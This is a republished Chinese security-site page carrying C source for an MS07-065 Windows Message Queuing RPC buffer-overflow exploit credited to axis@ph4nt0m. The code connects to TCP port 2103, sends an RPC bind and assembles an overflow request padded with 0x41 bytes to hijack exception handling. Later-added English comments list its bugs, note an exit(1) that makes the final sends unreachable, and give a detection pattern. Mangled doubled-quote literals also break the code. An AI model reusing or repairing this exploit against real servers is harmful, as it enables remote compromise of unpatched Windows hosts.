
windows消息队列服务远程RPC利用

来源:西部网安 作者: 时间:2008-04-04 点击:

  connect (s, (struct sockaddr *) &target, sizeof (target));
  if ((i = select (s + 1, 0, &wd, 0, &tv)) == (-1))
    {
      closesocket (s);
      return -3;
    }
  if (i == 0)
    {
      closesocket (s);
      return -4;
    }
  i = sizeof (int);
  getsockopt (s, SOL_SOCKET, SO_ERROR, (char *) &bf, &i);
  if ((bf != 0) || (i != sizeof (int)))
    {
      closesocket (s);
      return -5;
    }
  ioctlsocket (s, FIONBIO, &bf);
  return s;
}


/* Tear down the connection used by main(): release the socket, then the
 * Winsock library state.  WSACleanup() is process-wide, so this is meant
 * as a one-shot teardown just before the program returns. */
void Disconnect (SOCKET s)
{
  closesocket (s);
  WSACleanup ();
}




/****************************************************/



/*
 * Entry point of the MS07-065 proof-of-concept listing on this page.
 *
 * Command line (parsed below):  -h <host>   -p <port, default 2103>   -n <name>
 * `usage`, `Make_Connection`, `request_1a/1b/1c`, `request_1`, `request_2`
 * and `bind_str` are defined elsewhere in the file (not visible here);
 * usage() presumably prints help and exits.
 *
 * Flow: parse arguments, widen `name` to two bytes per character, initialise
 * Winsock, connect, send `bind_str`, assemble `request_1` from the three
 * request_1* pieces, then exit.  Note the unconditional exit(1) before any
 * request is sent: in this copy everything after it is unreachable, so the
 * listing as published never transmits request_1, the 0x41 fill or request_2.
 *
 * Review notes (defects visible in this block, left as-is):
 *  - argv[i + 1] is read for every option without checking i + 1 < argc, so
 *    a trailing option with no value reads past the end of argv.
 *  - `name` stays NULL when -n is omitted (argc >= 5 does not guarantee it);
 *    strlen(name) below then dereferences NULL.
 *  - request_1b is sized strlen(name) * 2 but receives a strcpy(), which
 *    writes strlen(name) + 1 bytes: for an empty name that is a one-byte heap
 *    overflow.  The strcpy is redundant anyway; the loop below overwrites it.
 *  - SOCKET is an unsigned type on Windows, so `s < 0` after Make_Connection()
 *    is always false and the connect-failure branch is effectively dead.
 *  - atoi() performs no range or format validation of the -p value.
 *  - request_1b and request_1 are never freed (the process exits right after).
 *  - The ''x'' character literals are a page-extraction artifact; the original
 *    source used ordinary single-quoted literals ('x').
 *
 * Detection note: the traffic this listing describes is a TCP connection to
 * port 2103 carrying an RPC bind followed by a request padded with a
 * 5104-byte run of 0x41 — a pattern worth alerting on for MSMQ hosts.
 *
 * Returns 0 on the (unreachable) normal path; otherwise terminates via exit(1).
 */
int
main (int argc, char *argv[])
{

  unsigned char *target = NULL;   /* -h value; passed to Make_Connection() unvalidated */
  unsigned char *name = NULL;     /* -n value; embedded (widened) into request_1 */
  int port = 2103;                /* -p value; the code treats 2103 as the service default */

  int i, j, len, len2;            /* len2 is never used */

  int ret;                        /* recv() result; never inspected */
  char buffer[6000] = { 0 };      /* 0x41 fill below, later reused as the recv buffer */
  SOCKET s;
  WSADATA WSAData;

  /* banner */
  printf("--------------------------------------------------------------------------\n");
  printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) - MK mod ==-\n");
  printf("-== code by axis@ph4nt0m ==-\n");
  printf("-== Http://www.ph4nt0m.org ==-\n");
  printf("-== Tested against Windows 2000 server SP4 ==-\n");
  printf
    ("--------------------------------------------------------------------------\n\n");

  /* Need at least "-h X -n Y"; usage() is defined elsewhere and presumably exits. */
  if (argc < 5)
    usage (argv[0]); //Handle parameters
  /* Option/value pairs.  NOTE: argv[i + 1] is never bounds-checked against argc. */
  for (i = 1; i < argc; i++)
    {
      if ((argv[i][0] == ''-''))
{
  switch (argv[i][1])
    {
    case ''h'':
      target = (unsigned char *) argv[i + 1];
      break;
    case ''p'':
      if (strcmp (argv[i + 1], "2103") == 0)
{
  printf ("[+] Attacking default port 2103\n");
}
      else
{
  port = atoi (argv[i + 1]);   /* no validation of the numeric value */
}
      break;
    case ''n'':
      name = (unsigned char *) argv[i + 1];
      break;
    default:
      printf ("[-] Invalid argument: %s\n", argv[i]);
      usage (argv[0]);
      break;
    }
  i++;   /* skip the consumed value */
}
      else
usage (argv[0]);
    }


  /* request_1b is file-scope.  Sized for the widened name (2 bytes per char);
     strlen(name) dereferences NULL if -n was not given. */
  request_1b = malloc (sizeof (char) * (strlen (name) * 2));

  if (request_1b == NULL)
    {
      printf ("Allocation Error\n");
      exit (1);
    }


  /* Redundant (the loop below rewrites every byte) and writes strlen + 1 bytes
     into a strlen * 2 buffer: overflows by one byte when name is empty. */
  strcpy (request_1b, name);


  /* Widen name: each source byte is followed by a 0x00 byte. */
  for (i = 0, j = 0; j < (strlen (name) * 2); j++)
    {
      if (!(j % 2))
{
  *(request_1b + j) = *(name + i);
}
      else
{
  *(request_1b + j) = ''\x00'';
  i++;
}
    }





/********************** attack payload ***************************/
  /* Winsock 1.1 initialisation; WSACleanup() on a failed startup is harmless. */
  if (WSAStartup (MAKEWORD (1, 1), &WSAData) != 0)
    {
      fprintf (stderr, "[-] WSAStartup failed.\n");
      WSACleanup ();
      exit (1);
    }


  Sleep (1200);   /* purpose not stated in the listing */


  /* Make_Connection() is defined earlier in the file; its visible tail returns
     negative codes (-3..-5) on failure.  Since SOCKET is unsigned on Windows,
     the `s < 0` test below cannot fire. */
  s = Make_Connection ((char *) target, port, 10);
  if (s < 0)
    {
      fprintf (stderr, "[-] connect err.\n");
      exit (1);
    }

  /* Payload stage: RPC bind first, then the request. */
  printf ("[*]Sending our Payload, Good Luck! ^_^\n");

  printf ("[*]Sending RPC Bind String!\n");

  send (s, bind_str, sizeof (bind_str), 0);   /* bind_str is a file-scope array */


  Sleep (1000);

  printf ("[*]Sending RPC Request Now!\n");

  /* request_1 = request_1a (56 bytes) + widened name + request_1c (640 bytes). */
  len = 56 + (strlen (name) * 2) + 640;

  request_1 = calloc (len, sizeof (char));   /* file-scope; zero-filled, never freed */

  if (request_1 == NULL)
  {
    printf ("Allocation Error\n");
    exit (1);
  }

  memcpy (request_1, request_1a, 56);
  memcpy (request_1 + 56, request_1b, (strlen (name) * 2));
  memcpy (request_1 + 56 + (strlen (name) * 2), request_1c, 640);


  /* Unconditional exit: every statement below is unreachable in this listing. */
  exit(1);

  memset (buffer, ''\x41'', sizeof (buffer)); // fill the buffer to trigger SEH
  send (s, request_1, sizeof (request_1), 0);
  send (s, buffer, 5104, 0); // 5104-byte 0x41 fill to trigger SEH
  send (s, request_2, sizeof (request_2), 0);


  Sleep (100);

  /* Reuse buffer for the reply; result is not examined. */
  memset (buffer, 0, sizeof (buffer));
  ret = recv (s, buffer, sizeof (buffer) - 1, 0);
  //printf("recv: %s\n", buffer);

  Disconnect (s);   /* closesocket() + WSACleanup() */

  return 0;
}
